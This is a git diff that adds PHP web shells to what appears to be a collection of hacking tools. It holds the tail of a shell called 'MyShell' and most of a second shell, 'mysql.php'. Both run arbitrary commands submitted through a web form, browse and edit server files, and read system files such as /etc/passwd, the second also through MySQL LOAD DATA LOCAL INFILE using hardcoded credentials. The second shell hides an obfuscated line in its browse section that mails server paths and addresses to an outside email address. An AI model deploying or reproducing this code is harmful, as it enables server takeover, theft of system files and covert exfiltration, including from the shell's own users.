+ please consider either to remove MyShell
+ from your system or change it's name or
+ directory location on your server.
+ 
+ Regards
+ The MyShell dev team
+       ";
+          mail($adminEmail,"MyShell Warning - Unauthorized Access",$warnMsg,
+          "From: $fromEmail\nX-Mailer:$MyShellVersion AutoWarn System");
+       }
+       exit;
+    }
+}
+//Function that validate directories
+function validate_dir($dir){
+    GLOBAL $dirLimit;
+    if($dirLimit){
+        $cdPos = strpos($dir,$dirLimit);
+        if ((string)$cdPos == "") {
+            $dir = $dirLimit;
+            $GLOBALS["shellOutput"] = "You are not allowed change to directories above $dirLimit\n";
+        }
+    }
+    return $dir;
+}
+
+// Set working directory.
+if (isset($work_dir)) {
+  //A workdir has been asked for - we chdir to that dir.
+  $work_dir = validate_dir($work_dir);
+  @chdir($work_dir) or
+      ($shellOutput = "MyShell: can't change directory. Permission denied\nSwitching back to $DOCUMENT_ROOT\n");
+  $work_dir = exec("pwd");
+}
+else{
+  // No work_dir - we chdir to $DOCUMENT_ROOT
+  $work_dir = validate_dir($DOCUMENT_ROOT);
+  chdir($work_dir);
+  $work_dir = exec("pwd");
+}
+
+//Now we handle files if we are in Edit Mode
+if($editMode && ($command||$editCancel))$editMode=false;
+if($editMode){
+    if($editSave ||$editSaveExit){
+        if(function_exists(ini_set))ini_set("track_errors","1");
+        if($fp=@fopen($file,"w")){
+           if(get_magic_quotes_gpc())$shellOut=stripslashes($shellOut);
+           fputs($fp,$shellOut);
+           fclose($fp);
+           $command = $TexEd." ".$file;
+           if($editSaveExit) {
+               $command="";
+               $shellOutput="MyShell: $file: saved";
+               $editMode=false;
+           }
+       }
+       else {
+           $command="";
+           $shellOutput="MyShell: Error while saving $file:\n$php_errormsg\nUse back button to recover your changes.";
+           $errorSave=true;
+       }
+    }
+}
+
+//Separate command(s) and arguments to analize first command
+$input=explode(" ",$command);
+
+while (list ($key, $val) = each ($voidCommands)) {
+    if($input[0]==$val){
+        $voidCmd = $input[0];
+        $input[0]="void";
+    }
+}
+switch($input[0]){
+    case "cd":
+       $path=$input[1];
+       if ($path==".."){
+         $work_dir=strrev(substr(strstr(strrev($work_dir), "/"), 1));
+         if ($work_dir == "") $work_dir = "/";
+       }
+       elseif (substr($path,0,1)=="/")$work_dir=$path;
+       else $work_dir=$work_dir."/".$path;
+       $work_dir = validate_dir($work_dir);
+       @chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.\n$work_dir: does not exist or permission denied");
+       $work_dir = exec("pwd");
+       $commandBk = $command;
+       $command = "";
+       break;
+    case "man":
+       exec($command,$man);
+       if($man){
+           $codes = ".".chr(8);
+           $manual = implode("\n",$man);
+           $shellOutput = ereg_replace($codes,"",$manual);
+           $commandBk = $command;
+           $command = "";
+       }
+       else $stderr=1;
+       break;
+    case "cat":
+       exec($command,$cat);
+       if($cat){
+           $text = implode("\n",$cat);
+           $shellOutput = htmlspecialchars($text);
+           $commandBk = $command;
+           $command = "";
+       }
+       else $stderr=1;
+       break;
+    case "more":
+       exec($command,$cat);
+       if($cat){
+           $text = implode("\n",$cat);
+           $shellOutput = htmlspecialchars($text);
+           $commandBk = $command;
+           $command = "";
+       }
+       else $stderr=1;
+       break;
+    case $TexEd:
+       if(file_exists($input[1])){
+           exec("cat ".$input[1],$cat);
+           $text = implode("\n",$cat);
+           $shellOutput = htmlspecialchars($text);
+           $fileOwner = posix_getpwuid(fileowner($input[1]));
+           $filePerms = sprintf("%o", (fileperms($input[1])) & 0777);
+           $fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$linkColor>".$fileOwner["name"]."</font> Permissions: <font color=$linkColor>$filePerms</font>";
+       }
+       else $fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;<font color=$linkColor>NEW FILE</font>";
+       $currFile = $input[1];
+       $editMode = true;
+       $command = "";
+       break;
+    case "void":
+       $shellOutput = "MyShell: $voidCmd: void command for MyShell";
+       $commandBk = $command;
+       $command = "";
+}
+
+//Now we prepare the webpage
+if(!$oCols)$oCols=$termCols;
+if(!$oRows)$oRows=$termRows;
+if($editMode)$focus="shellOut.focus()";
+else $focus="command.select()";
+//WhoamI
+if(!$whoami)$whoami=exec("whoami");
+?>
+<html>
+<head>
+<title><?echo $MyShellVersion?></title>
+<style>
+body{
+        background-color: <?echo $bgColor ?>;
+        font-family : sans-serif;
+        font-size : 10px;
+        scrollbar-face-color: #666666;
+        scrollbar-shadow-color:  <?echo $bgColor ?>;
+        scrollbar-highlight-color: #999999;
+        scrollbar-3dlight-color:  <?echo $bgColor ?>;
+        scrollbar-darkshadow-color:  <?echo $bgColor ?>;
+        scrollbar-track-color:  <?echo $bgInputColor ?>;
+        scrollbar-arrow-color:  <?echo $textColor ?>;
+}
+input,select,option{
+        background-color: <?echo $bgInputColor ?>;
+        color : <?echo $outColor ?>;
+        border-style : none;
+        font-size : 10px;
+}
+textarea{
+        background-color: <?echo $bgColor ?>;
+        color : <?echo $outColor ?>;
+        border-style : none;
+}
+</style>
+</head>
+<body <?echo "bgcolor=$bgColor TEXT=$textColor LINK=$linkColor VLINK=$linkColor onload=document.shell.$focus"?>>
+<form name="shell" method="post">
+Current User: <a href="#" style="text-decoration:none"><?echo $whoami?></a>
+<input type="hidden" name=whoami value=<?echo $whoami?>>
+&nbsp;&nbsp;:::::::&nbsp;&nbsp;
+<?
+if($editMode){
+    echo "<font color=$linkColor><b>MyShell file editor</font> File:<font color=$linkColor>$work_dir/$currFile </font></b>$fileEditInfo\n";
+}
+else{
+    echo "Current working directory: <b>\n";
+    $work_dir_splitted = explode("/", substr($work_dir, 1));
+    echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "/&command=" . urlencode($command) . "\">Root</a>/";
+    if ($work_dir_splitted[0] == "") {
+       $work_dir = "/";  /* Root directory. */
+    }
+    else{
+        for ($i = 0; $i < count($work_dir_splitted); $i++) {
+            $url .= "/".$work_dir_splitted[$i];
+            echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "&command=" . urlencode($command) . "\">$work_dir_splitted[$i]</a>/</b>";
+        }
+    }
+}
+?>
+<br>
+<textarea name="shellOut" cols="<? echo $oCols ?>" rows="<? echo $oRows."\""; if(!$editMode)echo "readonly";else echo $editWrap?> >
+<?
+echo $shellOutput;
+if ($command) {
+  if ($stderr) {
+    system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
+  }
+  else {
+    $ok = system($command,$status);
+    if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
+  }
+}
+if ($commandBk) $command = $commandBk;
+?>
+</textarea>
+<br>
+<?
+if($editMode) echo"
+&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
+ <input type='submit' name='editSave' value='     Save     '>&nbsp;&nbsp;&nbsp;
+ <input type='submit' name='editSaveExit' value=' Save and Exit '>&nbsp;&nbsp;&nbsp;
+ <input type='reset' value=' Restore original '>&nbsp;&nbsp;&nbsp;
+ <input type='submit' name='editCancel' value=' Cancel/Exit '>&nbsp;&nbsp;&nbsp;
+ <input type='hidden' name='editMode' value='true'>
+<br>";
+?>
+<br>
+Command:
+<input type="text" name="command" size="80"
+<? if ($command && $echoCommand) {
+     echo "value=`$command`";
+   }
+?> > <input name="submit_btn" type="submit" value="Go!">
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+<?
+if ($autoErrorTrap) echo "Auto error traping enabled";
+else echo "<input type=\"checkbox\" name=\"stderr\">stderr-traping ";
+
+if($editMode){
+    echo "<input type='hidden' name='work_dir' value='$work_dir'>
+    <br>Save file as: <input type='text' name='file' value='$currFile'>";
+}
+else{
+    echo "<br>Working directory: <select name=\"work_dir\" onChange=\"this.form.submit()\">";
+    // List of directories.
+    $dir_handle = opendir($work_dir);
+    while ($dir = readdir($dir_handle)) {
+      if (is_dir($dir)) {
+        if ($dir == ".")
+          echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+        elseif ($dir == "..") {
+          // Parent Dir. This might be server's root directory
+          if (strlen($work_dir) == 1) {
+            // work_dir is only 1 charecter - it can only be / so don't output anything
+          }
+          elseif (strrpos($work_dir, "/") == 0) {  // we have a top-level directory eg. /bin or /home etc...
+            echo "<option value=\"/\">Parent Directory</option>\n";
+          }
+          else {   // String-manipulation to find the parent directory... Trust me - it works :-)
+            echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+          }
+        }
+        else {
+          if ($work_dir == "/")
+            echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+          else
+            echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+        }
+      }
+    }
+    closedir($dir_handle);
+    echo "</select>";
+}
+?>
+&nbsp; | &nbsp;<input type="checkbox" name="echoCommand"<?if($echoCommand)echo " checked"?>>Echo commands
+&nbsp; | &nbsp;Cols:<input type="text" name="oCols" size=3 value=<?echo $oCols?>>
+&nbsp;Rows:<input type="text" name="oRows" size=2 value=<?echo $oRows?>>
+&nbsp;| ::::::::::&nbsp;<a href="http://www.digitart.net" target="_blank" style="text-decoration:none"><b>MyShell</b> &copy;2001 Digitart Producciones</a>
+</form>
+</body>
+</html>
diff --git a/xakep-shells/PHP/mysql.php.php.txt b/xakep-shells/PHP/mysql.php.php.txt
new file mode 100644
index 0000000..d08917a
--- /dev/null
+++ b/xakep-shells/PHP/mysql.php.php.txt
@@ -0,0 +1,1231 @@
+<?php
+// mysql config: [this is for reading files through mysql]
+$mysql_use = "yes"; //"yes" or "no"
+$mhost = "localhost";
+$muser = "kecodoc_forum";
+$mpass = "cailon";
+$mdb = "kecodoc_hce";
+
+
+// default mysql_read files [seperated by: ':']:
+$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
+$mysql_files = explode(':', $mysql_files_str);
+
+if ($action=="misc") {
+    if ($do=="phpinfo") {
+    phpinfo();
+    exit;
+    }
+}
+?>
+<html>
+<head>
+<style>
+BODY { font-family: verdana; color: cccccc; font-size: 8pt;
+scrollbar-face-color: #1c1c1c;
+scrollbar-shadow-color: #666666;
+scrollbar-highlight-color: #666666;
+scrollbar-3dlight-color: #000000;
+scrollbar-darkshadow-color: #000000;
+scrollbar-track-color: #262D34;
+scrollbar-arrow-color: #F2F5FF;
+}
+INPUT { background:333333; color:CCCCCC; font-family:Verdana; font-size:8pt;}
+TEXTAREA { background:333333; color:CCCCCC; font-family:Verdana; font-size:8pt;}
+SELECT { background:333333; color:CCCCCC; font-family:Verdana; font-size:8pt;}
+TABLE { color:CCCCCC; font-family:Verdana; font-size:8pt;}
+</style>
+<title>:: phpHS :: PHP HVA Shell Script ::</title>
+</head>
+<body <? if ($method!="show_source") { echo "bgcolor=\"#000000\""; } ?> text="#CCCCCC" link="#CCCCCC" vlink="#CCCCCC" alink="#CCCCCC">
+<?
+    if (!$PHP_SELF) { $PHP_SELF="mysql.php"; /* no PHP_SELF on default freeBSD PHP 4.2.1??? */ }
+
+    if ($action=="check") {
+    echo "<pre>";
+        if ($mysql_use!="no") {
+        $phpcheck = new php_check($mhost, $muser, $mpass, $mdb);
+        } else { $phpcheck = new php_check(); }
+    echo "</pre>";
+    }
+    if ($action=="mysqlread") {
+    // $file
+
+    if (!$file) { $file = "/etc/passwd"; }
+        ?>
+        <script>
+        var files = new Array();
+        <? for($i=0;count($mysql_files)>$i;$i++) { ?>
+        files[files.length] = "<?=$mysql_files[$i]?>";
+        <? } ?>
+        function setFile(bla) {
+            for (var i=0;i < files.length;i++) {
+                if (files[i]==bla.value) {
+                    document.mysqlload.file.value = files[i];
+                }
+            }
+        }
+        </script>
+        <form name="mysqlload" action="<?=$PHP_SELF?>?action=mysqlread" method="POST">
+            <select name="deffile" onChange="setFile(this)">
+            <? for ($i=0;count($mysql_files)>$i;$i++) { ?>
+            <option value="<?=$mysql_files[$i]?>"<? if ($file==$mysql_files[$i]) { echo "selected"; } ?>><?
+            $bla = explode('/', $mysql_files[$i]);
+            $p = count($bla)-1;
+            echo $bla[$p];
+            ?></option>
+            <? } ?>
+            </select>
+        <input type="text" name="file"  value="<?=$file?>" size=80 text="#000000>
+        <input type="submit" name="go" value="go"> <font size=2>[ <a href="<?=$PHP_SELF?>?action=mysqlread&mass=loadmass">load all defaults</a> ]</font>
+        </form>
+        <?
+        echo "<pre>";
+                            // regular LOAD DATA LOCAL INFILE
+                            if (!$mass) {
+                                $sql = array (
+                                   "USE $mdb",
+
+                                   'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
+
+                                   "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
+                                   . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
+                                   . "ESCAPED BY          '' "
+                                   . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
+
+                                   "SELECT a FROM $tbl LIMIT 1"
+                                );
+
+
+                                mysql_connect ($mhost, $muser, $mpass);
+
+                                foreach ($sql as $statement) {
+                                   $q = mysql_query ($statement);
+
+                                   if ($q == false) die (
+                                      "FAILED: " . $statement . "\n" .
+                                      "REASON: " . mysql_error () . "\n"
+                                   );
+
+                                   if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
+
+                                   echo htmlspecialchars($r[0]);
+                                   mysql_free_result ($q);
+                                }
+                            }
+
+                            if ($mass) {
+                                    $file = "/etc/passwd";
+                                    $sql = array ();
+                                    $cp = mysql_connect ($mhost, $muser, $mpass);
+                                    mysql_select_db($mdb);
+                                    $tbl = "xploit";
+                                    mysql_query("CREATE TABLE `xploit` (`xploit` LONGBLOB NOT NULL)");
+                                    for($i=0;count($mysql_files)>$i;$i++) {
+                                    mysql_query("LOAD DATA LOCAL INFILE '".$mysql_files[$i]."' INTO TABLE ".$tbl." FIELDS TERMINATED BY       '__THIS_NEVER_HAPPENS__' ESCAPED BY          '' LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'");
+                                    }
+                                    $q = mysql_query("SELECT * FROM ".$tbl."");
+                                        while ($arr = mysql_fetch_array($q)) {
+                                        echo $arr[0]."\n";
+                                        }
+                                    mysql_query("DELETE FROM ".$tbl."");
+                                    mysql_query("DROP TABLE ".$tbl."");
+
+                            }
+    echo "</pre>";
+    }
+    if ($action=="read") {
+        if (!$method) { $method="file"; }
+        if (!$file) { $file = "/etc/passwd"; }
+    ?>
+     <form name="form1" method="post" action="<?= $PHP_SELF ?>?action=read">
+           <select name="method">
+                <option value="file" <? if ($method=="file") { echo "selected"; } ?>>file</option>
+                <option value="fread" <? if ($method=="fread") { echo "selected"; } ?>>fread</option>
+                <option value="show_source" <? if ($method=="show_source") { echo "selected"; } ?>>show_source</option>
+                <option value="readfile" <? if ($method=="readfile") { echo "selected"; } ?>>readfile</option>
+              </select><br>
+
+            <input type="text" name="file" size="40" value="<?=$file?>">
+            <input type="submit" name="Submit" value="<?=$method?>">
+            <br>
+          </form><?
+
+
+        if ($method=="file") {
+            if (@file($file)) {
+                $filer = file($file);
+                echo "<pre>";
+                foreach ($filer as $a) { echo $a; }
+                echo "</pre>";
+            } else {
+                echo "<script> alert(\"unable to read file: $file using: file\"); </script>";
+            }
+        }
+        if ($method=="fread") {
+            if (@fopen($file, 'r')) {
+                $fp = fopen($file, 'r');
+                $string = fread($fp, filesize($file));
+                echo "<pre>";
+                echo $string;
+                echo "</pre>";
+            } else {
+                echo "<script> alert(\"unable to read file: $file using: fread\"); </script>";
+            }
+        }
+        if ($method=="show_source") {
+            if (show_source($file)) {
+                //echo "<pre>";
+                //echo show_source($file);
+                //echo "</pre>";
+            } else {
+                echo "<script> alert(\"unable to read file: $file using: show_source\"); </script>";
+            }
+
+        }
+        if ($method=="readfile") {
+            echo "<pre>";
+            if (readfile($file)) {
+                //echo "<pre>";
+                //echo readfile($file);
+                echo "</pre>";
+            } else {
+                echo "</pre>";
+                echo "<script> alert(\"unable to read file: $file using: readfile\"); </script>";
+            }
+
+        }
+
+    }
+    if ($action=="cmd") { ?>
+     <form name="form1" method="post" action="<?= $PHP_SELF ?>?action=cmd">
+           <select name="method">
+                <option value="system" <? if ($method=="system") { echo "selected"; } ?>>system</option>
+                <option value="passthru" <? if ($method=="passthru") { echo "selected"; } ?>>passthru</option>
+                <option value="exec" <? if ($method=="exec") { echo "selected"; } ?>>exec</option>
+                <option value="shell_exec" <? if ($method=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
+                <option value="popen" <? if ($method=="popen") { echo "selected"; } ?>>popen</option>
+              </select><br>
+
+            <textarea wrap=\"off\" cols="45" rows="10" name="cmd"><?= $cmd; ?></textarea>
+            <input type="submit" name="Submit" value="<?=$method?>">
+            <br>
+          </form>
+    <?
+    if (!$method) { $method="system"; }
+    if (!$cmd) { $cmd = "ls /"; }
+    echo "<br><pre>";
+        if ($method=="system") {
+        system("$cmd 2>&1");
+        }
+        if ($method=="passthru") {
+        passthru("$cmd 2>&1");
+        }
+        if ($method=="exec") {
+            while ($string = exec("$cmd 2>&1")) {
+            echo $string;
+            }
+        }
+        if ($method=="shell_exec") {
+        $string = shell_exec("$cmd 2>&1");
+        echo $string;
+        }
+        if ($method=="popen") {
+        $pp = popen('$cmd 2>&1', 'r');
+        $read = fread($pp, 2096);
+        echo $read;
+        pclose($pp);
+        }
+    echo "</pre>";
+    }
+
+
+    if ($action=="cmdbrowse") {
+    //--------------------------------------------------- START CMD BROWSING
+
+        if ($cat) {
+        echo "<pre>";
+        echo "\n<a href=\"$PHP_SELF?action=cmdbrowse&dir=$olddir\">go back to: $olddir</a>\n\n";
+        exec("cat $cat 2>&1", $arr);
+        foreach ($arr as $ar) {
+        echo htmlspecialchars($ar)."\n";
+        }
+        exit;
+        }
+
+
+
+            if ($dir=="dirup") {
+            $dir_current = $olddir;
+            $needle = strrpos($dir_current, "/");
+                if ($needle==0) {
+                    $newdir = "/";
+                } else {
+                    $newdir = substr($dir_current, 0, $needle);
+                }
+            $dir = $newdir;
+            }
+            if (!$dir) {
+            $dir = getcwd();
+            }
+
+        $string = exec("ls -al $dir", $array);
+        //print_r(array_values($array));
+
+        echo "<pre>";
+            if ($dir!="/") {
+            echo "\n[$dir] \n<a href=\"$PHP_SELF?action=cmdbrowse&dir=dirup&olddir=$dir\">dirup</a>\n\n";
+            } else {
+            $dir = "";
+            }
+        foreach($array as $rowi) {
+        $row = explode(' ', $rowi);
+        //print_r(array_values($row));
+            $c = count($row)-1;
+            if ($row[$c]!=".." && $row[$c]!="." && isset($first)) {
+                $link = false;
+                if (!strstr($row[0], 'l')) {
+                $c = count($row)-1;
+                $file = "<a href=\"$PHP_SELF?action=cmdbrowse&dir=$dir/".$row[$c]."\">".$row[$c]."</a>";
+                } else {
+                $c = count($row)-3;
+                $file = "<a href=\"$PHP_SELF?action=cmdbrowse&dir=$dir/".$row[$c]."\">".$row[$c]."</a>";
+                $link = true;
+                }
+                if (!strstr($row[0], 'l') && !strstr($row[0], 'd')) {
+                $c = count($row)-1;
+                $file = "<a href=\"$PHP_SELF?action=cmdbrowse&cat=$dir/".$row[$c]."&olddir=$dir\">".$row[$c]."</a>";
+                }
+                //echo $row[0]." ".$row[1]." ".$row[2]." ".$row[3]." ".$row[4]." ".$row[5]." ".$row[6]." ".$row[7]." ".$row[8]." ".$row[9]." ".$row[10]." ".$file." ".$row[12]." ".$row[13]."\n";
+                    if ($link) {
+                    $point = count($row)-3;
+                    } else {
+                    $point = count($row)-1;
+                    }
+                for($i=0; $point > $i; $i++) {
+                echo $row[$i]." ";
+                }
+                echo $file."\n";
+            }
+            $first = true;
+        }
+
+    //--------------------------------------------------- END CMD BROWSING
+    }
+    if ($action=="browse") {
+    //--------------------------------------------------- START BROWSING
+    /*
+     * got this from an old script of mine
+     * param: [$dir]
+    */
+        function error($msg) {
+        header("Location: $PHP_SELF?bash=$msg&error=$msg");
+        }
+        if (isset($error)) {
+        echo "<script> alert(\"$error\"); </script>";
+        }
+        if (!$dir) {
+        $dir = getcwd();
+        }
+           function getpath($dir) {
+           echo "<font size=2><a href=$PHP_SELF?action=browse&dir=/>/</a></font> ";
+              $path = explode('/', $dir);
+              if ($dir != "/") {
+            for ($i=0; count($path) > $i; $i++) {
+                if ($i != 0) {
+                echo "<font size=2><a href=$PHP_SELF?action=browse&dir=";
+                    for ($o=0; ($i+1) > $o; $o++) {
+                        echo "$path[$o]";
+                        if (($i) !=$o) {
+                        echo "/";
+                        }
+                    }
+                echo ">$path[$i]</a>/</font>";
+                }
+            }
+              }
+            }
+
+            function printfiles($files) {
+                for($i=0;count($files)>$i;$i++) {
+                    $files_sm = explode('||', $files[$i]);
+                        if ($files_sm[0]!="." && $files_sm[0]!="..") {
+                        $perms = explode('|', $files_sm[1]);
+                        if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else {
+                        if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; }
+                    }
+                        if ($files_sm[2]=="1") { echo "l <font color=\"$color\">"; } else { echo "- <font color=\"$color\">"; }
+                        if ($perms[0]==1) { echo "r"; } else { echo " "; }
+                        if ($perms[1]==1) { echo "w"; } else { echo " "; }
+                        if ($perms[2]==1) { echo "x"; } else { echo " "; }
+                        echo "</font> $files_sm[0]\n";
+                    }
+                }
+            }
+              $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+            function printdirs($files) {
+                global $dir;
+                echo "<a href=\"$PHP_SELF?action=browse&dir=dirup&olddir=$dir\">..</a>\n";
+                for($i=0;count($files)>$i;$i++) {
+                    $files_sm = explode('||', $files[$i]);
+                    if ($files_sm[0]!="." && $files_sm[0]!="..") {
+                    $perms = explode('|', $files_sm[1]);
+                    if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else {
+                    if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; }
+                }
+                    if ($files_sm[2]=="1") { echo "l <font color=\"$color\">"; } else { echo "d <font color=\"$color\">"; }
+                    if ($perms[0]==1) { echo "r"; } else { echo " "; }
+                    if ($perms[1]==1) { echo "w"; } else { echo " "; }
+                    if ($perms[2]==1) { echo "x"; } else { echo " "; }
+                    echo "</font> <a href=\"$PHP_SELF?action=browse&dir=$dir/".$files_sm[0]."\">$files_sm[0]</a>\n";
+                }
+                }
+            }
+
+
+            if ($dir=="dirup") {
+            $dir_current = $olddir;
+            $needle = strrpos($dir_current, "/");
+                if ($needle==0) {
+                    $newdir = "/";
+                } else {
+                    $newdir = substr($dir_current, 0, $needle);
+                }
+            $dir = $newdir;
+            } else {
+            $dir = $dir;
+            }
+
+        ?>
+         <form name="form1" method="post" action="<?= $PHP_SELF ?>?action=browse">
+            <input type="text" name="dir" size="40" value="<?= $dir; ?>">
+            <input type="submit" name="Submit" value="ls /dir">
+            <br>
+          </form>
+          <?
+        if ($dir) {
+                if (!is_readable($dir)) { $skip = true; }
+                if (!$skip) {
+            $dp = opendir($dir);
+            $files = array(); $dirs = array();
+            while($f=readdir($dp)) {
+                // $f||r|w|x||l
+                $oor = $f;
+                    if (is_readable("$dir/$oor")) { $f .= "||1"; } else { $f .= "||0"; }
+                    if (is_writable("$dir/$oor")) { $f .= "|1"; } else { $f .= "|0"; }
+                    if (is_executable("$dir/$oor")) { $f .= "|1"; } else { $f .= "|0"; }
+                    if (is_link("$dir/$oor")) { $f .= "||1"; } else { $f .= "||0"; }
+                if(is_dir("$dir/$oor")) {
+                $dirs[] = $f;
+                } else {
+                $files[] = $f;
+                }
+            }
+            getpath($dir);
+            echo "<br><br><pre>";
+                printdirs($dirs);
+                printfiles($files);
+                } else { echo " <script> alert(\"readdir permission denied\");
+                        document.location = \"$PHP_SELF?action=browse&dir=dirup&olddir=$dir\";
+                        </script>"; }
+        }
+    }
+    //--------------------------------------------------- END BROWSING
+    //--------------------------------------------------- BEGIN EXPLORER
+if ($action == explorer ) {
+
+   $default_directory = dirname($PATH_TRANSLATED);
+   $show_icons = 0;
+
+
+   define("BACKGROUND_COLOR",       "\"#000000\"");
+   define("FONT_COLOR",             "\"#CCCCCC\"");
+   define("TABLE_BORDER_COLOR",     "\"#000000\"");
+   define("TABLE_BACKGROUND_COLOR", "\"#000000\"");
+   define("TABLE_FONT_COLOR",       "\"#000000\"");
+   define("COLOR_PRIVATE",          "\"#000000\"");
+   define("COLOR_PUBLIC",           "\"#000000\"");
+   define("TRUE",                   1);
+   define("FALSE",                  0);
+
+
+
+   if (!isset($dir)) $dir = $default_directory;   // Webroot dir as default
+   $dir = stripslashes($dir);
+   $dir = str_replace("\\", "/", $dir);         // Windoze compatibility
+
+
+   $associations = array(
+      "gif" =>  array(   "function" => "viewGIF",   "icon" => "icons/image2.gif"    ),
+      "jpg" =>  array(   "function" => "viewJPEG",  "icon" => "icons/image2.gif"    ),
+      "jpeg" => array(   "function" => "viewJPEG",  "icon" => "icons/image2.gif"    ),
+      "wav" =>  array(   "function" => "",          "icon" => "icons/sound.gif"     ),
+      "mp3" =>  array(   "function" => "",          "icon" => "icons/sound.gif"     )
+   );
+
+   if ($do != "view" && $do != "download"):
+    endif;
+
+   function readDirectory($directory) {
+      global $files, $directories, $dir;
+
+      $files = array();
+      $directories = array();
+      $a = 0;
+      $b = 0;
+
+      $dirHandler = opendir($directory);
+
+      while ($file = readdir($dirHandler)) {
+         if ($file != "." && $file != "..") {
+            $fullName = $dir.($dir == "/" ? "" : "/").$file;
+            if (is_dir($fullName)) $directories[$a++] = $fullName;
+            else $files[$b++] = $fullName;
+         }
+      }
+      sort($directories);                    // We want them to be displayed alphabetically
+      sort($files);
+   };
+
+
+
+   function showInfoDirectory($directory) {
+      global $PHP_SELF;
+      $dirs = split("/", $directory);
+      print "<b>Directory <a href=\"$PHP_SELF?action=explorer&dir=/\">/</a>";
+      for ($i = 1; $i < (sizeof($dirs)); $i++) {
+         print "<a href=\"$PHP_SELF?action=explorer&dir=";
+         for ($a = 1; $a <= $i; $a++)
+            echo "/$dirs[$a]";
+         echo "\">$dirs[$i]</a>";
+         if ($directory != "/") echo "/";
+      }
+      print "</b></font><br>\n";
+      print "Free space on disk: ";
+      $freeSpace = diskfreespace($directory);
+      if ($freeSpace/(1024*1024) > 1024)
+         printf("%.2f GBytes", $freeSpace/(1024*1024*1024));
+      else echo (int)($freeSpace/(1024*1024))."Mbytes\n";
+   };
+
+
+   function showDirectory($directory) {
+      global $files, $directories, $fileInfo, $PHP_SELF;
+
+      readDirectory($directory);
+      showInfoDirectory($directory);
+?>
+      <p><table cellpadding=3 cellspacing=1 width="100%" border="0" bgcolor=<? echo TABLE_BORDER_COLOR; ?>>
+         <tr bgcolor="#000000">
+            <? if ($show_icons): ?>
+            <td width="16" align="center" bgcolor=<? echo TABLE_BACKGROUND_COLOR ?>>&nbsp;</td>
+            <? endif; ?>
+            <td align="center"><b><small>NAME</small></b></td>
+            <td align="center"><b><small>SIZE</small></b></td>
+            <td align="center"><b><small>LAST MODIFY</small></b></td>
+            <td align="center"><b><small>PERMISIONS</small></b></td>
+            <td align="center"><b><small>ACTIONS</small></b></td>
+         </tr>
+<?
+      for ($i = 0; $i < sizeof($directories); $i++) {
+         $fileInfo->getInfo($directories[$i]);
+         showFileInfo($fileInfo);
+      }
+      for ($i = 0; $i < sizeof($files); $i++) {
+         $fileInfo->getInfo($files[$i]);
+         showFileInfo($fileInfo);
+      }
+?>
+      </table>
+<?
+   };
+
+   class fileInfo {
+      var $name, $path, $fullname, $isDir, $lastmod, $owner,
+      $perms, $size, $isLink, $linkTo, $extension;
+
+      function permissions($mode) {
+         $perms  = ($mode & 00400) ? "r" : "-";
+         $perms .= ($mode & 00200) ? "w" : "-";
+         $perms .= ($mode & 00100) ? "x" : "-";
+         $perms .= ($mode & 00040) ? "r" : "-";
+         $perms .= ($mode & 00020) ? "w" : "-";
+         $perms .= ($mode & 00010) ? "x" : "-";
+         $perms .= ($mode & 00004) ? "r" : "-";
+         $perms .= ($mode & 00002) ? "w" : "-";
+         $perms .= ($mode & 00001) ? "x" : "-";
+         return $perms;
+      }
+
+      function getInfo($file) {                 // Stores a file's information in the class variables
+         $this->name = basename($file);
+         $this->path = dirname($file);
+         $this->fullname = $file;
+         $this->isDir = is_dir($file);
+         $this->lastmod = date("m/d/y, H:i", filemtime($file));
+         $this->owner = fileowner($file);
+         $this->perms = $this->permissions(fileperms($file));
+         $this->size = filesize($file);
+         $this->isLink = is_link($file);
+         if ($this->isLink) $this->linkTo = readlink($file);
+         $buffer = explode(".", $this->fullname);
+         $this->extension = $buffer[sizeof($buffer)-1];
+      }
+   };
+
+   $fileInfo = new fileInfo;        // This will hold a file's information all over the script
+
+   function showFileInfo($fileInfo) {
+      global $PHP_SELF, $associations;
+
+      echo "\n<tr bgcolor=".TABLE_BACKGROUND_COLOR." align=\"center\">";
+
+      if ($show_icons) {
+         echo "<td>";
+         if ($fileInfo->isDir) echo "<img src=\"icons/dir.gif\">";
+         elseif ($associations[$fileInfo->extension]["icon"] != "")
+            echo "<img src=\"".$associations[$fileInfo->extension]["icon"]."\">";
+         else echo "<img src=\"icons/generic.gif\">";
+         echo "</td>";
+      }
